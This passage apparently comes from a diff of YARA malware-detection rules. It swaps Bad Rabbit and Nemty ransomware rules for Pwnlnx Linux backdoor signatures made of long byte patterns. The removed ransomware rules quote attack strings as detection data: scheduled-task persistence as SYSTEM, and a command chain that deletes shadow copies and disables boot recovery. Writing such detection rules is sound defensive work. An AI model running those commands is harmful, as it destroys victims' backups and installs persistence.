2??0000000000000000000008??0000000000004302??????00000000000000000000????????????0000??????????????000000000000000000000A??0000000000003F01??????00000000000000000000????????????0000??????000012??00000000000000000000F0????00000000????01??????00000000000000000000??????????????00002F02??????00000000000000000000????01??00000000????????????00000000000000000000????000000000000??????????????0000000000000000000080????00000000????02??????00000000000000000000????000000000000??????000012??0000000000000000000074??000000000000BF????????00000000000000000000????????????0000????02??????00000000000000000000??????000000000000FA0000????00000000000000000000????????????0000??????000012??0000000000000000000011??000000000000A8??000012??0000000000000000000044000000000000??????000012??000000000000000000005A000000000000??????000012??0000000000000000000029??000000000000C6????????00000000000000000000????000000000000????????????00000000000000000000????000000000000????0000????00000000000000000000????????00000000????????????00000000000000000000??????000000000000BC????????00000000000000000000????02??00000000????01??????00000000000000000000??????00000000000034??000012??00000000000000000000A1????????0000????????????00000000000000000000????????????0000??????????????000000000000000000004B000000000000????0000????00000000000000000000????000000000000??????000012??0000000000000000000005????????0000??????000012??0000000000000000000031??00000000000074??000012??00000000000000000000FF??0000000000005E02??????00000000000000000000????000000000000????????????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????02??????00000000000000000000??????000000000000DE??000012??000000000000000000007B??00000000000030??000012??0000000000000000000075??000000000000D9??000012??000000000000000000000E000000000000????????????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????????????00000000000000000000????????????0000????????????00000000000000000000????000000000000????02??????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????????????00000000000000000000??????0000000000005201??????0000????174000000000????00000000000000005F5F676D6F6E5F73??6172??5F5F??????76??52656769????????????6173??6573??6C69????????????61642E????2E30??72??63????72??6D??????68????????5F63????6174????????6E6474????????75??65??????69??????????????6E6F5F6C6F63????69????????????6B????74??72??6164??73??676D6173????????6E6E6563??????74??72??6164??73??6C66??????63????74??70??68????????5F6465????63????6663????6C????????63??73??2E????????63????74??73??72??70????????69????????????????????616E64??????6574??6174??6E??????74??77??69??????????????6469????????????5F6E74??61??????74??72??69??????????????70??????????6D6F6E????????74??6E??????6C6563??????6B????????72??616C6C6F63??676574??69??????????????73??72??6F6B????63????77????????70??6173??72??3634??73??67656D70??79??6574??6D656D73??74??72??6469??????????????????6565??????68????????6173??74??6D65??????74??6F63????70????????616E74??74??6475??32??73??67616464????74??69????????????6472??6663??????65??????74??6F63????70????????6C6C6F63??73??72??6174??72??616C70??74????????6D6F76????????656E6469????????????6C??????74??6F73??62????616D65??????6563??????????72??74????????656164??????6C6F63????74??6C6F63????74??6D65??????616E6469????????????616464??????????????6565????73??74??69????????????????????6D6D6F76????????70??6E3634??5F5F6C69????????????72??5F6D6169????????????73??73??70??69????????????65????????78??74??74??34??474C4942435F32??32??35????????42435F32??33??000002??02??02??03??02??02??02??03??03??02??02??02??0000000002??02??02??02??02??03??02??02??02??02??02??02??02??02??03??02??02??02??04??02??02??03??02??03??02??02??02??03??02??02??02??02??02??03??02??02??02??02??02??02??03??02??02??03??02??02??02??03??02??03??02??03??02??02??02??02??02??02??03??03??03??02??02??02??02??02??000001??01??24??000010??000020??000075??69??????????9602??00000000????????????????????000000000000????69????????????A2????????0000??????69??????????9602??00000000????81????????????060000????????????000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000000082??????0000????0000??????0000000000000000000008??????????0000070000????????????000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000??????6000000000????0000??????000000000000000000004882??????0000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000?????? }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "94f57453c539227031b918edd52fc7f1" and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
+		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
 }
-rule TRELLIX_ARC_Badrabbit_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_2 : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Bad Rabbit Ransomware"
+		description = "Rule to detect the backdoor pwnlnx variant 2"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "d6e78c14-0913-5eed-be15-a6d1a8cd1a8d"
-		date = "2026-02-01"
+		id = "c4ee686b-49d9-5566-b749-1144a19c1fee"
+		date = "2020-04-17"
 		modified = "2020-08-14"
-		reference = "https://securelist.com/bad-rabbit-ransomware/82851/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L49-L101"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L35-L65"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "7536f021ce7fede0f1a2bf2f4ebc7d6e7269a6dd63005cab1fc6a309a71c61c0"
+		hash = "08cc67002782cbafd97a4bff549d25dd72d6976d2fdf79339aaf5a3ff7c3107e"
+		logic_hash = "08ea40ba72677263a41f62097fc38040361ba595d67cb04979b66548c7f4d271"
 		score = 75
-		quality = 43
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/BadRabbit"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" fullword wide
-		$s2 = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\" fullword wide
-		$s3 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$s4 = "need to do is submit the payment and get the decryption password." fullword wide
-		$s5 = "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
-		$s6 = "rundll32 %s,#2 %s" fullword ascii
-		$s7 = " \\\"C:\\Windows\\%s\\\" #1 " fullword wide
-		$s8 = "Readme.txt" fullword wide
-		$s9 = "wbem\\wmic.exe" fullword wide
-		$s10 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
-		$og1 = { 39 74 24 34 74 0a 39 74 24 20 0f 84 9f }
-		$og2 = { 74 0c c7 46 18 98 dd 00 10 e9 34 f0 ff ff 8b 43 }
-		$og3 = { 8b 3d 34 d0 00 10 8d 44 24 28 50 6a 04 8d 44 24 }
-		$oh1 = { 39 5d fc 0f 84 03 01 00 00 89 45 c8 6a 34 8d 45 }
-		$oh2 = { e8 14 13 00 00 b8 ff ff ff 7f eb 5b 8b 4d 0c 85 }
-		$oh3 = { e8 7b ec ff ff 59 59 8b 75 08 8d 34 f5 48 b9 40 }
-		$oj4 = { e8 30 14 00 00 b8 ff ff ff 7f 48 83 c4 28 c3 48 }
-		$oj5 = { ff d0 48 89 45 e0 48 85 c0 0f 84 68 ff ff ff 4c }
-		$oj6 = { 85 db 75 09 48 8b 0e ff 15 34 8f 00 00 48 8b 6c }
-		$ok1 = { 74 0c c7 46 18 c8 4a 40 00 e9 34 f0 ff ff 8b 43 }
-		$ok2 = { 68 f8 6c 40 00 8d 95 e4 f9 ff ff 52 ff 15 34 40 }
-		$ok3 = { e9 ef 05 00 00 6a 10 58 3b f8 73 30 8b 45 f8 85 }
+		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????00000000000088????????????00000000??????38??05????????????????0000????????????0000000000000000??????0000000000004000000000??????0D??????????????0D????????0000????00000000????0000????0000????????????0000????????????0000????????????0000????12??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????????00000000????????00000000??????000000000000070000??????000080??????0000000080??????0000000080??????0000000028??00000000000070??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55????????????CC78??78??83????????????CB371F0000000080??????0000000025????????0000????7E??00000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000??????4200000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????76??00000000????????????0000????8B????00000000C8??????0000000025????????0000??????4200000000????76??00000000????????????0000????444200000000????76??00000000????????????0000??????4900000000????76??00000000????????????0000??????4600000000????76??00000000????????????0000????424200000000??????EC08??33??0000E8????????E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090554889??534883????80????????????75??BB????????488B??????????4881??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??B8????????4885??74??BF????????E8????????C6????????????4883????5BC9C30F1F????????????55B8????????4885??4889??74??BE????????BF????????E8????????4883????????????74??B8????????4885??74??BF????????C9FF??0F1F??????????C9C39090554889??534881??????????89??????????48C7????????????8B????3D????????0F87????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????BA????????488D??????????4889??4889??E8????????4889????4883??????0F84????????488D??????????488D??????????4889??4889??E8????????85??0F85????????488B??????????4889????C7????????????488B????89????488B????48C1????89????488B????4889????488B????4889??????488B????4889??????E8????????89????BE????????488D????E8????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????BE????????488D????E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??0F85????????8B????89??4889??48C1????8B????89??488D????4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7E??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??74??8B????48984801????488B????483B????7C??EB??90EB??90EB??90EB??90EB??90EB??90488B????4889??E8????????EB??90EB??90EB??90B8????????4881??????????5BC9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????0F84????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????488B????4889????488B????4889??????488B????4889??????E8????????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??0F84????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??0F84????????488D????8B????BA????????4889??89??E8????????85??74??488D????BE????????4889??E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??75??8B????83????75??8B????488B????4889????488B????4889??????488B????4889??????89??E8????????EB??90EB??90EB??90EB??90EB??908B????89??E8????????B8????????4881??????????5BC9C390554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????89??C1????F7????89??48980FB6??????????89??31??488B????88??83??????4883??????8B????3B????7C??488B????C9C3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????C9C39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????BA????????488D??????????488D??????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????0F84????????488D??????????488B????4889??4889??E8????????488D??????????488D????B9????????BA????????4889??4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????488D??????????4989??BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????488B??????????8B??????????4189??4181??????????8B??????????89??81??????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????4889??????4889??????488B????4889??????488B????4889????4589??4189??4889??BE????????4889?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and all of ( $og* ) ) or all of ( $oh* ) or all of ( $oj* ) or all of ( $ok* )
+		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
 }
-rule TRELLIX_ARC_Nemty_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_3 : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Nemty Ransomware"
+		description = "Rule to detect the backdoor pwnlnx variant"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "e9b133d6-fd77-5201-995d-c42bae7cde46"
-		date = "2020-02-23"
+		id = "02ea1eb2-7235-5ed5-86ba-19d52e8fb428"
+		date = "2020-04-17"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L1-L45"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L67-L97"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "73bf76533eb0bcc4afb5c72dcb8e7306471ae971212d05d0ff272f171b94b2d4"
-		logic_hash = "d055286670516318c14dcf4e5873b96eede5e1dfb3ee978553fc11f1ac6b3252"
+		hash = "08f29e234f0ce3bded1771d702f8b5963b144141727e48b8a0594f58317aac75"
+		logic_hash = "8a1405f430ce57810577f65ef43a1425601bf49b5adb4f6f935505427ad9dc94"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nemty"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}" fullword ascii
-		$s2 = "https://pbs.twimg.com/media/Dn4vwaRW0AY-tUu.jpg:large :D" fullword ascii
-		$s3 = "MSDOS.SYS" fullword wide
-		$s4 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} " ascii
-		$s5 = "recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" fullword ascii
-		$s6 = "DECRYPT.txt" fullword ascii
-		$s7 = "pv3mi+NQplLqkkJpTNmji/M6mL4NGe5IHsRFJirV6HSyx8mC8goskf5lXH2d57vh52iqhhEc5maLcSrIKbukcnmUwym+In1OnvHp070=" fullword ascii
-		$s8 = "\\NEMTY-DECRYPT.txt\"" fullword ascii
-		$s9 = "rfyPvccxgVaLvW9OOY2J090Mq987N9lif/RoIDP89luS9Ouv9gUImpgCTVGWvJzrqiS8hQ5El02LdEvKcJ+7dn3DxiXSNG1PwLrY59KzGs/gUvXnYcmT6t34qfZmr8g8" ascii
-		$s10 = "IO.SYS" fullword wide
-		$s11 = "QgzjKXcD1Jh/cOLBh1OMb+rWxUbToys2ArG9laNWAWk0rNIv2dnIDpc+mSbp91E8qVN8Mv8K5jC3EBr4TB8jh5Ns/onBhPZ9rLXR7wIkaXGeTZi/4/XOtO3DFiad4+vf" ascii
-		$s12 = "NEMTY-DECRYPT.txt" fullword wide
-		$s13 = "pvXmjPQRoUmjj0g9QZ24wvEqyvcJVvFWXc0LL2XL5DWmz8me5wElh/48FHKcpbnq8C2kwQ==" fullword ascii
-		$s14 = "a/QRAGlNLvqNuONkUWCQTNfoW45DFkZVjUPn0t3tJQnHWPhJR2HWttXqYpQQIMpn" fullword ascii
-		$s15 = "KeoJrLFoTgXaTKTIr+v/ObwtC5BKtMitXq8aaDT8apz98QQvQgMbncLSJWJG+bHvaMhG" fullword ascii
-		$s16 = "pu/hj6YerUnqlUM9A8i+i/UhnvsIE+9XTYs=" fullword ascii
-		$s17 = "grQkLxaGvL0IBGGCRlJ8Q4qQP/midozZSBhFGEDpNElwvWXhba6kTH1LoX8VYNOCZTDzLe82kUD1TSAoZ/fz+8QN7pLqol5+f9QnCLB9QKOi0OmpIS1DLlngr9YH99vt" ascii
-		$s18 = "BOOTSECT.BAK" fullword wide
-		$s19 = "bbVU/9TycwPO+5MgkokSHkAbUSRTwcbYy5tmDXAU1lcF7d36BTpfvzaV5/VI6ARRt2ypsxHGlnOJQUTH6Ya//Eu0jPi/6s2MmOk67csw/msiaaxuHXDostsSCC+kolVX" ascii
-		$s20 = "puh4wXjVYWJzFN6aIgnClL4W/1/5Eg6bm5uEv6Dru0pfOvhmbF1SY3zav4RQVQTYMfZxAsaBYfJ+Gx+6gDEmKggypl1VcVXWRbxAuDIXaByh9aP4B2QvhLnJxZLe+AG5" ascii
+		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????000000000000B0??3A??000000000000000040??????????????????????01??000005????????0000000000000000??????0000000000004000000000????????????0000????????????00000000????00000000????0000????0000????A40C??00000000C0??????????????C0??????????????5013??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????000000000000????000000000000??????000000000000070000??????0000C0??????????????C0??????????????C0??????????????28??00000000000078??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000??????000000000000C0????????????????????????0000????84????00000000C8??????0000000025????????0000????374200000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000??????4200000000????A56C00000000????????????0000????24??00000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000????83??????0000????A56C00000000????????????0000????5E42000000000000A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????914200000000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000??????4200000000??????EC08??4301??????62??0000E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090B8????????55482D????????4883????4889??76??B8????????4885??74??5DBF????????FF??660F1F????????????5DC366666666????????????????????BE????????554881??????????48C1????4889??4889??48C1????4801??48D1??74??B8????????4885??74??5DBF????????FF??0F1F??5DC3660F1F??????80????????????75??554889??53BB????????4881??????????4883????488B??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??E8????????B8????????4885??74??BF????????E8????????C6????????????4883????5B5DF3??669055B8????????4885??4889??74??BE????????BF????????E8????????BF????????4883????75??5DE9????????6690B8????????4885??74??FF??EB??9090554889??534881??????????89??????????48C7????????????8B????3D????????76??E9????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????BE????????4889??E8????????4889????4883??????75??E9????????488D??????????488D??????????4889??4889??E8????????85??74??E9????????488B??????????4889????C7????????????488B????89????488B????48C1????89????4883????FF????FF????FF????E8????????4883????89????BE????????488D????E8????????8B??????????BA????????488D????89??E8????????85??75??E9????????8B??????????BA????????488D????89??E8????????85??75??E9????????BE????????488D????E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??E9????????8B????89??48C1????4889??8B????89??4801??4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7F??EB??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??75??EB??8B????48984801????488B????483B????7C??488B????4889??E8????????B8????????488B????C9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????75??E9????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????4883????FF????FF????FF????E8????????4883????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??75??E9????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??75??EB??488D????8B????BA????????4889??89??E8????????85??75??EB??488D????BE????????4889??E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??EB??8B????83????74??EB??8B????4883????FF????FF????FF????89??E8????????4883????908B????89??E8????????B8????????488B????C9C3554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????99F7????89??48980FB6??????????31??89??488B????88??83??????4883??????8B????3B????7C??488B????5DC3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????5DC39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????488D??????????488D??????????4889??BA????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????75??E9????????488D??????????488B????4889??4889??E8????????488D????488D??????????B9????????BA????????4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????488D??????????488D??????????4989??4889??BA????????BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????4989??488B??????????8B??????????25????????89??8B??????????25????????89??488B????8B????4863??48C1????4801??488B??488D????488D??????????415052FF????FF????4189??4189??BA????????BE????????4889??B8????????E8????????4883????488B????4889??E8????????4889??488D?????????? }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) )
+		uint16( 0 ) == 0x457f and filesize < 4000KB and all of them
 }
-rule TRELLIX_ARC_Nemty_Ransomware_2_6 : RANSOMWARE FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_4 : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Nemty Ransomware version 2.6"
+		description = "Rule to detect the backdoor pwnlnx variant 4"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "335dff33-d078-58ba-b68b-a949895b710f"
-		date = "2020-04-06"
+		id = "199bb534-f0f6-5b67-aedd-3eada5e45cc6"
+		date = "2020-04-17"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L47-L80"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L99-L129"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "52b7d20d358d1774a360bb3897a889e14d416c3b2dff26156a506ff199c3388d"
-		logic_hash = "dacf709838ef2ef65d25bdbbd92007ab46a95953031d7bee75eac046f670171a"
+		hash = "2590ab56d46ff344f2aa4998efd1db216850bdddfc146d5d37e4b7d07c7336fc"
+		logic_hash = "11203beee446aaf0783d3a8d3839a88ef16c27d52be8670d650ebf6a1de2c3aa"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nemty"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????A1????????33??89????8B????578D??????????89??????????E8????????33??6A??5839????76??5683????75??508D????5350E8????????8D??????????508D????E8????????83????6A??5880??????75??C6??????4879??EB??FE????33??8A??????8B??????????30????47403B????72??5E8B????33??5FE8????????C9C3558B??51515333??5633??32??89????39????0F86????????578B????8B????8A????8B??83????74??4F74??4F75??21????0FB6??0FB6??83????8B??C1????C1????0B??8A??????????83????88????8A??????????8B????88??????83????EB??0FB6??0FB6??83????6A??C1????C1????5E0B??EB??33??0FB6??46C1????8A??????????88????40FF????8A??8B????3B????72??5F4E74??4E75??0FB6??83????8A????????????88????C6????????83????EB??0FB6??83????C1????8A??????????88????66????????????83????5EC6??????5BC9C3558B??33??F6??????75??5733??39????76??8B????8A????80????74??80????7C??80????7F??0FB6??8A??????????80????74??8B??83????83????74??4A74??4A74??4A75??08????40EB??8A??C0????80????08????40C0????EB??8A??C0????80????08????40C0????EB??C0????88????473B????72??EB??33??5F5DC3558B??518B??85??74??8B????568B??89????3B??74??576A??33??E8????????83????3B????75??5FFF??E8????????595E33??89??89????89????C9C3558B??80??????74??83??????72??538B??85??74??575356E8????????83????53E8????????595BC7????????????89????C6??????5DC2????C7??????????E9????????558B??568B??C7??????????E8????????F6??????74??56E8????????598B??5E5DC2????558B??83????81??????????A1????????33??89????????????5356578D????508D??????E8????????68????????8D????????????E8????????6A??5F33??83????66????????8D????8B??33??5089??????89??????E8????????E8????????33??66????????8B????????????03??????83????8D??????89??????89??????E8????????538D??????5083????8D??????E8????????538D????????????5083????E8????????8B??8D??????E8????????6A??33??E8????????83????????8B??????73??8D??????8D????????????5150FF??????????89??????83????0F84????????8B??????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????F6??????????????8D????????????508D??????8D??????74??E8????????598D??????51E8????????8B??598D??????E8????????6A??33??8D??????E8????????6A??8D??????E8????????83????8D??????8B??50E8????????E8????????83????E9????????E8????????8B??598D??????E8????????6A??33??8D??????E8????????8D????????????50FF??????????508D??????E8????????8B??????6A??5F39??????73??8D??????8B??????????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????